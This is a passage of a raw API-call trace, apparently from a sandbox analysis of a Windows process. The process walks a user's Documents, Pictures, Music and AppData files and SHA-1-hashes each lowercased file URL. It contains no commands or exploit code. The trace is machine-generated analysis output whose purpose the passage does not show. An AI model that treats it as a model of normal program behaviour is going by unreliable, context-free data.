pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x96, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.345] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/wAd%207n-fSHbyZijv4Z.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/wad%207n-fshbyzijv4z.docx") returned="file:///c:/users/ciihmnxmn6ps/documents/wad%207n-fshbyzijv4z.docx" [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.346] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z" [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.346] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/j2vBMqsOO8e3zFJ.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/j2vbmqsoo8e3zfj.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/j2vbmqsoo8e3zfj.mp3" [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xc2, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.346] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj" [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.346] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/Z6CamFmXK%20P.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/z6camfmxk%20p.mkv") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/z6camfmxk%20p.mkv" [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.346] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.346] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.346] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.346] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/OIvI5uuAohs.ods" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/oivi5uuaohs.ods") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/oivi5uuaohs.ods" [0067.346] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.347] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-" [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x5c, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x5e, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.347] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/zmL-F7vUe.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/zml-f7vue.bmp") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/zml-f7vue.bmp" [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.347] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/uNcEfcoR9kX7P2n8N.ods" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/uncefcor9kx7p2n8n.ods") returned="file:///c:/users/ciihmnxmn6ps/desktop/uncefcor9kx7p2n8n.ods" [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.347] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/67%20OpV5bb1WaL3ICHP.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/67%20opv5bb1wal3ichp.m4a") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/67%20opv5bb1wal3ichp.m4a" [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.347] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.347] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.347] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.347] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.348] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/vW3UfT7dUIZ.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/vw3uft7duiz.mp3") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/vw3uft7duiz.mp3" [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.348] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/WTILC_gn/UgILWPxSdgt.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/ugilwpxsdgt.bmp") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/ugilwpxsdgt.bmp" [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xb4, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0xb6, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.348] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/XMNFOsvQHz.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/xmnfosvqhz.xlsx") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/xmnfosvqhz.xlsx" [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.348] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/a0ukP9xf2oy.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/a0ukp9xf2oy.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/a0ukp9xf2oy.gif" [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.348] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/3K7qHOdG7.doc" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/3k7qhodg7.doc") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/3k7qhodg7.doc" [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.348] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.348] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.348] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.348] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.349] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/jbFHZ5LCSb6W.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/jbfhz5lcsb6w.docx") returned="file:///c:/users/ciihmnxmn6ps/documents/jbfhz5lcsb6w.docx" [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65ed88, pbData=0x198270, dwDataLen=0x76, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65ed88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65ed88) returned 1 [0067.349] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/CIvwLQB" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb" [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.349] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/vrdQ93vNW8e04btB.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/vrdq93vnw8e04btb.flv") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/vrdq93vnw8e04btb.flv" [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.349] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/Bzpyb79Z9-MXpWnAG8-q.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/bzpyb79z9-mxpwnag8-q.jpg") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/bzpyb79z9-mxpwnag8-q.jpg" [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.349] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r" [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.349] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x56, dwFlags=0x0) returned 1 [0067.349] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.349] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.349] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x58, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.350] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/OJGg6B4d07.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/ojgg6b4d07.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/ojgg6b4d07.avi" [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x68, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f2c8) returned 1 